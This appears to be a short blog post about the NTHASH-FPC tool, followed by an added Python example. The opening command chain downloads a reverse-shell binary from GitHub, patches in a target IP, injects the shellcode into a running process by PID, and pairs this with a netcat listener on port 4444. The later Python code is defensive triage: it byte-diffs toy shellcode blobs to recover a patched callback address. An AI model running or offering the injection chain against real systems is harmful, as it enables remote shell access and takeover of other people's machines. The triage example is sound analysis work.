July 31, 2023
NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996
The above will, in three steps:
- download a binary and convert it to its textual hexa form
- replace the default outbound IP (127.0.0.1) with the real target IP (here 192.168.1.190)
- inject the shellcode into the memory of the specified pid and execute it
On the remote host, run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shellcode).
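Because the payload is a fixed template with constants patched in, an analyst who captures the injected bytes can recover the configured callback address without running the sample: byte-diff the captured copy against the unmodified template and decode each changed run. The following is an added example written for that triage step; it is not part of the original post or of the NTHASH-FPC project, and the two hex blobs it diffs are constructed toy data (a filler prefix, a two-byte port field, a four-byte address field, a return opcode), not the real revshell64.bin.

```python
# Added example, not from the original post or the NTHASH-FPC project.
# Diff a known shellcode template against a captured, patched copy and decode
# every changed run so the configured callback address/port can be read off.
from typing import List, Tuple


def hexa_to_bytes(hexa: str) -> bytes:
    """Parse the textual hexa form (what /download2hexa emits) into raw bytes."""
    cleaned = "".join(hexa.split())
    if len(cleaned) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(cleaned)


def diff_runs(template: bytes, sample: bytes) -> List[Tuple[int, bytes, bytes]]:
    """Return (offset, old_bytes, new_bytes) for each contiguous run of differing bytes."""
    if len(template) != len(sample):
        raise ValueError("blobs differ in length; not a same-size constant patch")
    runs = []
    i, n = 0, len(template)
    while i < n:
        if template[i] == sample[i]:
            i += 1
            continue
        start = i
        while i < n and template[i] != sample[i]:
            i += 1
        runs.append((start, template[start:i], sample[start:i]))
    return runs


def decode_run(old: bytes, new: bytes) -> str:
    """Interpret a changed run: 4 bytes as a network-order IPv4, 2 bytes as a
    network-order port; anything else is reported as raw hex only."""
    raw = f"({old.hex().upper()} -> {new.hex().upper()})"
    if len(new) == 4:
        dotted = lambda b: ".".join(str(x) for x in b)
        return f"ipv4 {dotted(old)} -> {dotted(new)} {raw}"
    if len(new) == 2:
        return f"port {int.from_bytes(old, 'big')} -> {int.from_bytes(new, 'big')} {raw}"
    return f"{len(new)} bytes {raw}"


def triage(template_hexa: str, sample_hexa: str) -> List[str]:
    """One report line per patched constant, with its offset inside the blob."""
    t, s = hexa_to_bytes(template_hexa), hexa_to_bytes(sample_hexa)
    return [f"offset 0x{off:04X}: {decode_run(old, new)}" for off, old, new in diff_runs(t, s)]


# Constructed toy blobs (NOT the real revshell64.bin): 4 filler bytes, then a
# sockaddr-style port field (4444 = 0x115C) and address field, then a RET.
TEMPLATE_HEXA = "90909090" + "115C" + "7F000001" + "C3"
SAMPLE_HEXA = "90909090" + "115C" + "C0A801BE" + "C3"

if __name__ == "__main__":
    for line in triage(TEMPLATE_HEXA, SAMPLE_HEXA):
        print(line)
```

Runs are reported as contiguous changed bytes, so an address whose trailing octets happen to match the template's shows up as a shorter run; the raw hex is always included so the field can still be read in context of its offset.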